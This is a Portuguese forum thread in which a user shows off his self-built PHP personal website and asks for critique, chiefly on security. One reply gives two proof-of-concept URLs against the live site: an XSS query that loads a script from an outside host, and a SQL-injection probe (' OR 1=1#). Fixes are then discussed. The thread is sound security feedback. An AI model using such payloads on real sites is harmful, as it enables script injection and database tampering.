• Revista PROGRAMAR: Já está disponível a edição #53 da revista programar. Faz já o download aqui!

Revolt

Revolt Personal Website

15 mensagens neste tópico

Titulo do Projecto: Revolt Personal Website

Última Versão: N/A

Líder do Projecto: Revolt (antigo Pauzinhos)

Descrição do Projecto:

Website pessoal feito por mim do nada para praticar PHP, CSS e XHTML. Por enquanto só tenho o frontend feito e os dados são introduzidos directamente na BD. Durante as férias a ver se trato de fazer um backoffice.

O template também foi feito por mim no Photoshop tendo por base designs web 2.0.

Críticas, comentários e recomendações (principalmente de segurança, não sei até que ponto está totalmente seguro) são apreciados ;)

Site: http://revolt.hyperhub.info

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Birth Date: 11/07/1991  não seria born ?

De resto... gostei ;), tá aprovado.. parabéns.

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

penso que não. Birth Date -> Data de Nascimento :)

Obrigado ;)

Muito bem feito :P Só acho que os botões e os <input /> podiam ter outro aspecto a condizer com o site :)

Parabéns :)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Muito bem feito ;) Só acho que os botões e os <input /> podiam ter outro aspecto a condizer com o site ;)

Parabéns :)

Por acaso eu acho que está bem assim... :P

Como fizeste a escolha da cor do template? DHTML + JS?

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Por acaso eu acho que está bem assim... ;)

Como fizeste a escolha da cor do template? DHTML + JS?

Pelo que percebi, foi por meio de uma querystring, do género:

index.php?theme=lime ;)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

exactamente.

index.php?theme=line e depois é guardado numa cookie ;)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

http://revolt.hyperhub.info/blog.php?action=search&query=%3Cscript+src%3Dhttp%3A%2F%2Fkakakeys.com%2Fxs.js%3E%3C%2Fscript%3E

Tens um problema de XSS e code (HTML) injection.

http://revolt.hyperhub.info/blog.php?action=search&query=%5C%27+OR+1%3D1%23

Estás a fazer addslashes() vezes a mais (não te admires com dados manhosos na bd) por teres as magic_quotes activas e não verificares isso, usa algo mais limpo.

http://revolt.hyperhub.info/contact.php

Não fazes qualquer verificação de SPAM, não fazes controlo do email address (nem sequer se existe um @), etc..

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

htmlentities() no output resolverá isso? Ou há outra maneira melhor?

http://revolt.hyperhub.info/blog.php?action=search&query=%5C%27+OR+1%3D1%23

Estás a fazer addslashes() vezes a mais (não te admires com dados manhosos na bd) por teres as magic_quotes activas e não verificares isso, usa algo mais limpo.

Qual será a melhor solução? Desactivar as magic_quotes?

http://revolt.hyperhub.info/contact.php

Não fazes qualquer verificação de SPAM, não fazes controlo do email address (nem sequer se existe um @), etc..

Eh obrigado por me lembrares lulz ;)

EDIT: Ora vê lá se já tá tudo ;)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

htmlentities() no output resolverá isso? Ou há outra maneira melhor?

Em principio sim, deve resolver.

Qual será a melhor solução? Desactivar as magic_quotes?

Se possível, sim. Mas tem atenção que um simples addslashes() depois continua a não te resolver o problema no output. Faz também htmlentities() no output. E algo me diz que vai aparecer uma vulnerabilidade de sql injection depois... Mas logo vejo isso. ;)
EDIT: Ora vê lá se já tá tudo ;)

Agora não posso que estou a bulir, depois lembra-me.
0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Parece estar muito bom. Só a letra é que acho que está num tamanho algo pequeno...

Se calhar, como sugestão, tal como fazes nos temas, por uns botoes para aumentar o tipo de letra...

De resto não tenho nada a apontar, está simples e arrumado.  ;)

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Está muito bom, mas acho que no menu deverias por um style block para poder clicar como se fosse um botão.

E esta, penso eu, não é a secção correcta para apresentar isto ;) Penso que a mais correcta é numa das subsecções de Interfaces Visuais (Apresentação de Trabalhos ou Webdesign, por exemplo...).

0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

E esta, penso eu, não é a secção correcta para apresentar isto ;) Penso que a mais correcta é numa das subsecções de Interfaces Visuais (Apresentação de Trabalhos ou Webdesign, por exemplo...).

Ele está a apresentar o site (codado de origem por ele, não usa um CMS qq e espeta-lhe com uma skin) como um todo, não apenas o design, logo pertence aqui.
0

Partilhar esta mensagem


Link para a mensagem
Partilhar noutros sites

Crie uma conta ou ligue-se para comentar

Só membros podem comentar

Criar nova conta

Registe para ter uma conta na nossa comunidade. É fácil!


Registar nova conta

Entra

Já tem conta? Inicie sessão aqui.


Entrar Agora